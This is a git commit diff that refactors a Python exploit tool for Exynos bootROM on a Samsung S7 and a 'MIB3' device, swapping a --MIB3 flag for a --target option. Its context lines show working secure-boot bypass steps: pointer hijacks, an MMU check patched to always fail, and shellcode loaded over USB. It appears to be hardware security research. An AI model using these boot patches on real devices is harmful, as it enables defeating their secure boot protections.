patching introduced bugs
This commit is contained in:
parent
e98ceea1d6
commit
1dec7120f1
2
source/exploit/.vscode/launch.json
vendored
2
source/exploit/.vscode/launch.json
vendored
@ -37,7 +37,7 @@
|
|||||||
"program": "exploit.py",
|
"program": "exploit.py",
|
||||||
"console": "integratedTerminal",
|
"console": "integratedTerminal",
|
||||||
"justMyCode": false,
|
"justMyCode": false,
|
||||||
"args": ["--debugger-boot", "--MIB3"], //, "--MIB3"
|
"args": ["--debugger-boot", "--target", "MIB3"], //, "--MIB3"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "Debug current file",
|
"name": "Debug current file",
|
||||||
|
@ -98,7 +98,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
|
bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
|
||||||
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
|
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
|
||||||
bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
|
bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
|
bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
|
||||||
bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
|
bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
|
||||||
bl2 = open("../mib3/boot_partitions/bl2_a.bin", "rb").read()
|
bl2 = open("../mib3/boot_partitions/bl2_a.bin", "rb").read()
|
||||||
@ -577,7 +577,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
|
bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
|
||||||
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
|
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
|
||||||
bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
|
bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
|
bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
|
||||||
bl1 = open("../mib3/modified_boot/fwbl1_mod.bin", "rb").read()
|
bl1 = open("../mib3/modified_boot/fwbl1_mod.bin", "rb").read()
|
||||||
bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
|
bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
|
||||||
@ -627,7 +627,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
|
self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
|
||||||
|
|
||||||
BL1_POINTER = 0x02021880
|
BL1_POINTER = 0x02021880
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
BL1_POINTER = 0x02021890
|
BL1_POINTER = 0x02021890
|
||||||
|
|
||||||
self.cd.memwrite_region(BL1_POINTER, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
|
self.cd.memwrite_region(BL1_POINTER, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
|
||||||
@ -680,7 +680,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
|
|
||||||
# Modifies/disables setting up MMU (but is set up eventually) -> MMU says 0x0 instead of 0x1, but still little access (and proper USB recovyer boot!?)
|
# Modifies/disables setting up MMU (but is set up eventually) -> MMU says 0x0 instead of 0x1, but still little access (and proper USB recovyer boot!?)
|
||||||
MMU_CHECK = 0x0202a314
|
MMU_CHECK = 0x0202a314
|
||||||
if not args.MIB3:
|
if not args.target == "MIB3":
|
||||||
MMU_CHECK = 0x020244e8
|
MMU_CHECK = 0x020244e8
|
||||||
self.cd.memwrite_region(MMU_CHECK, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false
|
self.cd.memwrite_region(MMU_CHECK, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false
|
||||||
|
|
||||||
@ -689,7 +689,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
|
|
||||||
# Jump into BL31 and execute it
|
# Jump into BL31 and execute it
|
||||||
BL31_POINTER = 0x02024010
|
BL31_POINTER = 0x02024010
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
BL31_POINTER = 0x0202a010
|
BL31_POINTER = 0x0202a010
|
||||||
self.cd.restore_stack_and_jump(BL31_POINTER) #BL31_RA_PTR
|
self.cd.restore_stack_and_jump(BL31_POINTER) #BL31_RA_PTR
|
||||||
else:
|
else:
|
||||||
@ -708,10 +708,10 @@ class S7Exploit(ExynosDevice):
|
|||||||
|
|
||||||
self.test_write_execute(0x11207010)
|
self.test_write_execute(0x11207010)
|
||||||
|
|
||||||
#if args.MIB3:
|
#if args.target == "MIB3":
|
||||||
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
|
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
|
||||||
|
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
self.cd.memwrite_region(0x020553e4, b"\x1f\x50\x00\x71")
|
self.cd.memwrite_region(0x020553e4, b"\x1f\x50\x00\x71")
|
||||||
self.cd.memwrite_region(0x020553f8, b"\x1f\x50\x00\x71")
|
self.cd.memwrite_region(0x020553f8, b"\x1f\x50\x00\x71")
|
||||||
|
|
||||||
@ -747,7 +747,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
self.usb_read(0x200)
|
self.usb_read(0x200)
|
||||||
|
|
||||||
# Change bootmode on S7 to SDCARD (allow normal booting, if pressing volume up)
|
# Change bootmode on S7 to SDCARD (allow normal booting, if pressing volume up)
|
||||||
if not args.MIB3:
|
if not args.target == "MIB3":
|
||||||
self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
|
self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
|
||||||
self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))
|
self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))
|
||||||
|
|
||||||
@ -758,7 +758,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
|
|
||||||
# Jump into a different function that continues the boot flow (different than BL33_LR)
|
# Jump into a different function that continues the boot flow (different than BL33_LR)
|
||||||
BL33_AUTH = 0x02024e5c
|
BL33_AUTH = 0x02024e5c
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
self.cd.memwrite_region(0xcf08aa59, b"\x4c\x44\x46\x58") #58 was 57 in INIT print
|
self.cd.memwrite_region(0xcf08aa59, b"\x4c\x44\x46\x58") #58 was 57 in INIT print
|
||||||
self.cd.memwrite_region(0xcf026b94, struct.pack('>I', 0x210000b4)) # Change bootmode to GPT
|
self.cd.memwrite_region(0xcf026b94, struct.pack('>I', 0x210000b4)) # Change bootmode to GPT
|
||||||
BL33_AUTH = 0x202ae18 # BL33_LR
|
BL33_AUTH = 0x202ae18 # BL33_LR
|
||||||
@ -840,11 +840,14 @@ if __name__ == "__main__":
|
|||||||
arg.add_argument("--unsecure-boot", action="store_true", help="Unsecure boot", default=False)
|
arg.add_argument("--unsecure-boot", action="store_true", help="Unsecure boot", default=False)
|
||||||
arg.add_argument("--debugger-boot", action="store_true", help="Unsecure boot", default=False)
|
arg.add_argument("--debugger-boot", action="store_true", help="Unsecure boot", default=False)
|
||||||
arg.add_argument("--load_ga", action="store_true", help="Load Gupje debugger", default=False)
|
arg.add_argument("--load_ga", action="store_true", help="Load Gupje debugger", default=False)
|
||||||
arg.add_argument("--MIB3", action="store_true", help="Whether boot is on a MIB3", default=False)
|
arg.add_argument("--target", type=str, help="Target device", default="s7", choices=["S7", "MIB3"])
|
||||||
|
|
||||||
args = arg.parse_args()
|
args = arg.parse_args()
|
||||||
exynos = S7Exploit()
|
exynos = S7Exploit()
|
||||||
|
|
||||||
|
# Load json configs from config folder
|
||||||
|
# config = open(f"config/{args.target}.json", "r").read()
|
||||||
|
|
||||||
if args.debug:
|
if args.debug:
|
||||||
shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
|
shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
|
||||||
exynos.exploit(shellcode)
|
exynos.exploit(shellcode)
|
||||||
|
@ -7,6 +7,9 @@ from ghidra_assistant.utils.debugger.debugger_archs.ga_arm64 import GA_arm64_deb
|
|||||||
from qiling.const import QL_ARCH
|
from qiling.const import QL_ARCH
|
||||||
import os, tqdm, datetime
|
import os, tqdm, datetime
|
||||||
|
|
||||||
|
ENDPOINT_BULK_IN = 0x81
|
||||||
|
ENDPOINT_BULK_OUT = 0x2
|
||||||
|
|
||||||
def p32(x):
|
def p32(x):
|
||||||
return struct.pack("<I", x)
|
return struct.pack("<I", x)
|
||||||
|
|
||||||
@ -31,6 +34,7 @@ class ExynosDevice():
|
|||||||
self.target = "8890" # TODO auto detect device
|
self.target = "8890" # TODO auto detect device
|
||||||
self.connect_device()
|
self.connect_device()
|
||||||
|
|
||||||
|
|
||||||
def connect_device(self):
|
def connect_device(self):
|
||||||
"""Setup proper connection, and ensure the connection is alive"""
|
"""Setup proper connection, and ensure the connection is alive"""
|
||||||
self.context = usb1.USBContext()
|
self.context = usb1.USBContext()
|
||||||
@ -58,12 +62,14 @@ class ExynosDevice():
|
|||||||
self.handle.claimInterface(0)
|
self.handle.claimInterface(0)
|
||||||
print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
|
print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
|
||||||
|
|
||||||
|
|
||||||
def disconnect(self):
|
def disconnect(self):
|
||||||
"""Disconnect the device"""
|
"""Disconnect the device"""
|
||||||
self.handle.releaseInterface(0)
|
self.handle.releaseInterface(0)
|
||||||
self.handle.close()
|
self.handle.close()
|
||||||
self.context.exit()
|
self.context.exit()
|
||||||
|
|
||||||
|
|
||||||
def write(self, data):
|
def write(self, data):
|
||||||
"""Write data to the device"""
|
"""Write data to the device"""
|
||||||
transferred = ctypes.c_int()
|
transferred = ctypes.c_int()
|
||||||
@ -71,6 +77,7 @@ class ExynosDevice():
|
|||||||
assert(res == 0), "Could not perform bulk transfer"
|
assert(res == 0), "Could not perform bulk transfer"
|
||||||
return res
|
return res
|
||||||
|
|
||||||
|
|
||||||
def usb_write(self, data):
|
def usb_write(self, data):
|
||||||
assert len(data) <= 0x200, "Data too big"
|
assert len(data) <= 0x200, "Data too big"
|
||||||
transferred = ctypes.c_int()
|
transferred = ctypes.c_int()
|
||||||
|
Loading…
Reference in New Issue
Block a user